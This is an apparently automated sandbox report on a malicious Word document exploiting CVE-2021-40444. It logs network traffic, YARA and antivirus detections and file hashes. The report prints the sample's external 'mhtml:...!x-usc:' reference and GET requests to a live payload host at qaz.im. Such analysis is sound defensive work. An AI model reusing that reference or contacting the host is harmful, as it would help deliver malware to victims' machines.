Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49171
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49192
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49191
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49190
Source: unknown	Network traffic detected: HTTP traffic on port 49175 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49171 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49192 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49173 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49177 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49179 -> 443

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{636165D4-957F-4FF6-8584-BFA7FFC416EB}.tmp

Jump to behavior

Source: unknown

DNS traffic detected: queries for: qaz.im

Source: global traffic	HTTP traffic detected: GET /load/diy5AH/b6d42680-56fd-4f98-ae0e-ff81e3799df6 HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: qaz.imConnection: Keep-AliveCookie: PHPSESSID=mdbvi74n6qrlvvumg9fr8g1sn4
Source: global traffic	HTTP traffic detected: GET /load/diy5AH/b6d42680-56fd-4f98-ae0e-ff81e3799df6 HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: qaz.imConnection: Keep-AliveCookie: PHPSESSID=mdbvi74n6qrlvvumg9fr8g1sn4
Source: global traffic	HTTP traffic detected: GET /load/diy5AH/b6d42680-56fd-4f98-ae0e-ff81e3799df6 HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: qaz.imConnection: Keep-AliveCookie: PHPSESSID=mdbvi74n6qrlvvumg9fr8g1sn4
Source: global traffic	HTTP traffic detected: GET /load/diy5AH/b6d42680-56fd-4f98-ae0e-ff81e3799df6 HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: qaz.imConnection: Keep-AliveCookie: PHPSESSID=mdbvi74n6qrlvvumg9fr8g1sn4

Source: unknown

HTTPS traffic detected: 82.202.173.45:443 -> 192.168.2.22:49171 version: TLS 1.2

Yara signature match

Source: document.xml.rels, type: SAMPLE

Matched rule: EXPL_CVE_2021_40444_Document_Rels_XML date = 2021-09-10, author = Jeremy Brown / @alteredbytes, description = Detects indicators found in weaponized documents that exploit CVE-2021-40444, reference = https://twitter.com/AlteredBytes/status/1435811407249952772

Source: nnxPt0Yydv.doc	ReversingLabs: Detection: 50%
Source: nnxPt0Yydv.doc	Virustotal: Detection: 48%

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: nnxPt0Yydv.LNK.0.dr

LNK file: ..\..\..\..\..\Desktop\nnxPt0Yydv.doc

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\Desktop\~$xPt0Yydv.doc

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\CVR7020.tmp

Jump to behavior

Source: classification engine

Classification label: mal68.expl.evad.winDOC@1/17@9/1

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: nnxPt0Yydv.doc

Initial sample: OLE zip file path = word/media/image1.jpg

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Persistence and Installation Behavior

Contains an external reference to another file

Source: document.xml.rels

Extracted files from sample: mhtml:https://qaz.im/load/diy5ah/b6d42680-56fd-4f98-ae0e-ff81e3799df6!x-usc:https://qaz.im/load/diy5ah/b6d42680-56fd-4f98-ae0e-ff81e3799df6

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
82.202.173.45	qaz.im	Russian Federation		29182	THEFIRST-ASRU	true

Contacted Domains

Name	IP	Active
qaz.im	82.202.173.45	true

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://qaz.im/load/diy5AH/b6d42680-56fd-4f98-ae0e-ff81e3799df6	false	3%, Virustotal, Browse Avira URL Cloud: safe	unknown

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-CNRY.FSD	data	30075DA75A69E03B91CDC295A738FE71	5C8EB1D3F7DC5B502212314F6405B25C9766603C	29A90C402102B1E2616519F5DE7AA09426AAAB3559494E5EBFDA3DA1DC16A660
C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{0CEDFB9A-672A-495E-A8C3-4E2E5CC4FEA5}.FSD	data	848796E37A8642B8F3B45C6176D8E814	2D1D922A49C8B09E7B9FB8E0FDFE9A642E65B624	92BB7EFDF1993B4DD43843D0595C911F5AE646CEC4047CEEC557E6B6E9C641DC
C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSF-CTBL.FSF	data	99A54F4CFBDA747E27CF539D4A1807FF	5EFB6E4012D07C7820C1022141A6B658AEC2CDB1	98FB7578F8FE1FAFDBE7B2AFD3B37E39161F2C3622433387CCF7AE6E178CC83E
C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD	data	E5AF351D93FC6BA388AB48ABD23907E0	5D4145B35593C774D5F88A1997109E79496E3821	D42FB125C2C4BAE8CE74C54BD189F356B596582D3EA1CB96AB1532A586FAAA9B
C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-{5B8C97A2-8D5D-4690-A237-D6E0C46FC601}.FSD	data	70560F4917331B2A17868068A1E9517E	359ADBCC510241A6528A866A1EA3B361D6EF93AF	475591FE9EC37DCD8BDBDE7E426317FD418DFEABEE6CD0DD0477A2D01834D97E
C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSF-{0E1EEE64-E8C6-4E2A-9759-63CF07FD8988}.FSF	data	46245F9209D2C7C555186D14DDE809A1	295F3AA146AF9E9C14506927280087F0919DD24E	21E9FB94661FAD6FB122E822A41EB27A2FDC31C0A526085D1A0BE3F732630FB9
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\1024203777.test[1].html	HTML document, ASCII text, with very long lines, with CRLF line terminators	C389F7EE1D9E6376B7D96E80D7A1FFE1	2D0B931CF7CECDDDDB35457A5719353840F8CA66	8A01945C5951B6685768C155D938E7805B097477FCBB7E815FCB1CC26F1170DA
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\1024203777.test[1].html	HTML document, ASCII text, with very long lines, with CRLF line terminators	C389F7EE1D9E6376B7D96E80D7A1FFE1	2D0B931CF7CECDDDDB35457A5719353840F8CA66	8A01945C5951B6685768C155D938E7805B097477FCBB7E815FCB1CC26F1170DA
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2EF4F663.html	HTML document, ASCII text, with very long lines, with CRLF line terminators	C389F7EE1D9E6376B7D96E80D7A1FFE1	2D0B931CF7CECDDDDB35457A5719353840F8CA66	8A01945C5951B6685768C155D938E7805B097477FCBB7E815FCB1CC26F1170DA
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8E5395CD.jpg	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 600x600, frames 3	66EBF5C50A28236AD77C5A306A4543E1	F6EAA2DF964C95A2EB044AA94F5A691C1752E4B8	E80BFCC0066D4DFCE09EE172F5082C14D8EED957E8BF14B60FFC57C2F0BB1BDB
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BC5065FC.html	HTML document, ASCII text, with very long lines, with CRLF line terminators	C389F7EE1D9E6376B7D96E80D7A1FFE1	2D0B931CF7CECDDDDB35457A5719353840F8CA66	8A01945C5951B6685768C155D938E7805B097477FCBB7E815FCB1CC26F1170DA
C:\Users\user\AppData\Local\Temp\{532AFB91-0C3D-4187-B83C-71D1E2833CCF}	data	DAA1E7900566342CE799FAC7815E1AFA	27E2175C96A6DA395860F5B87CCA811689FA8DDC	986189E409F4D446FDBC10306068115FB41CC06EFF771F10277DFAA969AEE504
C:\Users\user\AppData\Local\Temp\{F2BDA7F7-D38F-4DB4-86AB-78594ACAB021}	data	7B2A21167EF7DE65851D941C40B49C48	3E31789057B2852AD41409CF2D5616E30A6A842B	414B8D143DD15A3996171CB9AB5BD4EFC45F7915F7A65AF25441FBCE891B7CE2
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat	ASCII text, with CRLF line terminators	82ED92CE73F3F2C3BF91D4C76D3A4760	CEFFA2857F6D2C211B5C08CEC9957C3EAF09289A	83E793DEA3EBA35BCC76F8F6511BA90804AC6C71EA4B6A13AA5EA52C94C800FD
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\nnxPt0Yydv.LNK	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Mar 8 15:45:57 2022, mtime=Tue Mar 8 15:45:57 2022, atime=Fri Sep 2 19:23:18 2022, length=23549, window=hide	B33A705BC9650B7E27987D428B6A003A	E56964067C53E7D6D18A4378B44EB33409244099	F655020F81323BF78D21B11053DFD2C4B4F8C3673710F1854603736BDFC5ED7C
C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm	data	D9C8F93ADB8834E5883B5A8AAAC0D8D9	23684CCAA587C442181A92E722E15A685B2407B1	116394FEAB201D23FD7A4D7F6B10669A4CBCE69AF3575D9C1E13E735D512FA11
C:\Users\user\Desktop\~$xPt0Yydv.doc	data	D9C8F93ADB8834E5883B5A8AAAC0D8D9	23684CCAA587C442181A92E722E15A685B2407B1	116394FEAB201D23FD7A4D7F6B10669A4CBCE69AF3575D9C1E13E735D512FA11

AV Detection

Antivirus / Scanner detection for submitted sample

Source: nnxPt0Yydv.doc

Avira: detected

Multi AV Scanner detection for submitted file

Source: nnxPt0Yydv.doc	ReversingLabs: Detection: 50%
Source: nnxPt0Yydv.doc	Virustotal: Detection: 48%			Perma Link

Exploits

Detected CVE-2021-40444 exploit

Source: document.xml.rels

Extracted files from sample: mhtml:https://qaz.im/load/diy5ah/b6d42680-56fd-4f98-ae0e-ff81e3799df6!x-usc:https://qaz.im/load/diy5ah/b6d42680-56fd-4f98-ae0e-ff81e3799df6

Uses insecure TLS / SSL version for HTTPS connection

Source: unknown	HTTPS traffic detected: 82.202.173.45:443 -> 192.168.2.22:49172 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 82.202.173.45:443 -> 192.168.2.22:49173 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 82.202.173.45:443 -> 192.168.2.22:49175 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 82.202.173.45:443 -> 192.168.2.22:49184 version: TLS 1.0

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: unknown

HTTPS traffic detected: 82.202.173.45:443 -> 192.168.2.22:49171 version: TLS 1.2

Potential document exploit detected (unknown TCP traffic)

Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 82.202.173.45:443
